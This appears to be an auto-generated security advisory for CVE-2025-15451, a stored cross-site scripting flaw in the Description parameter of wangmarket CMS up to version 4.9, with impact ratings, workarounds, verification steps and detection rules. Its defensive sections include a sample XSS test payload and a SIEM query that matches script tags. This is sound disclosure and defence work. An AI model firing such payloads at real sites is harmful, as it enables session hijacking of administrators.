CVE-2025-15451 – This CVE describes a cross-site scripting (XSS)... (How to Fix)

Q: What is the severity of CVE-2025-15451?

CVE-2025-15451 has a CVSS score of 2.4 (LOW). This CVE describes a cross-site scripting (XSS) vulnerability in xnx3 wangmarket CMS versions up to 4.9. Attackers can inject malicious scripts via the Description parameter on the system variables page, potentially compromising user sessions or stealing credentials. The vulnerability affects administrators who access the vulnerable /admin/system/variableSave.do endpoint.

📋 TL;DR

This CVE describes a cross-site scripting (XSS) vulnerability in xnx3 wangmarket CMS versions up to 4.9. Attackers can inject malicious scripts via the Description parameter on the system variables page, potentially compromising user sessions or stealing credentials. The vulnerability affects administrators who access the vulnerable /admin/system/variableSave.do endpoint.

💻 Affected Systems

Products:

xnx3 wangmarket

Versions: Up to and including version 4.9

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects systems with the vulnerable /admin/system/variableSave.do endpoint accessible.

📦 What is this software?

Wangmarket by Wang.market

View all CVEs affecting Wangmarket →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, gain full administrative access to the CMS, deface websites, or install backdoors for persistent access.

🟠

Likely Case

Attackers would typically use this to hijack administrator sessions, modify website content, or redirect users to malicious sites.

🟢

If Mitigated

With proper input validation and output encoding, the attack would be prevented, limiting impact to failed exploitation attempts.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploit requires administrator access to the vulnerable endpoint. Public exploit code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Consider upgrading to a version above 4.9 if available, or implement workarounds.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side input validation to sanitize the Description parameter before processing.

Modify /admin/system/variableSave.do to include HTML entity encoding for user inputs

Web Application Firewall (WAF)

all

Deploy a WAF with XSS protection rules to block malicious payloads.

Configure WAF to block requests containing <script> tags or JavaScript in Description parameter

🧯 If You Can't Patch

Restrict access to /admin/system/variableSave.do endpoint using network ACLs or authentication requirements
Implement Content Security Policy (CSP) headers to mitigate XSS impact

🔍 How to Verify

Check if Vulnerable:

Check if your xnx3 wangmarket version is 4.9 or earlier by examining version files or admin panel.

Check Version:

Check version.txt file or admin dashboard for version information

Verify Fix Applied:

Test the Description parameter with XSS payloads like <script>alert('test')</script> to ensure it's properly sanitized.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /admin/system/variableSave.do with script tags in parameters
Multiple failed login attempts followed by successful admin access

Network Indicators:

HTTP requests containing <script> tags in POST data to the vulnerable endpoint

SIEM Query:

source="web_logs" AND uri_path="/admin/system/variableSave.do" AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2025-15451

CVSS v3 Score: 2.4 (LOW)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

CWE: CWE-79

EPSS Score: 0.03% exploit probability (7.2th percentile)

Published: January 5, 2026

Last Updated: January 13, 2026

🔗 References

https://vuldb.com/?ctiid.339484 Permissions Required,VDB Entry
https://vuldb.com/?id.339484 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.724838 Third Party Advisory,VDB Entry
https://www.yuque.com/cocount-eveo/lu0220/eg6s9gropfwtoz9w?singleDoc Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-15451, you might also want to check these: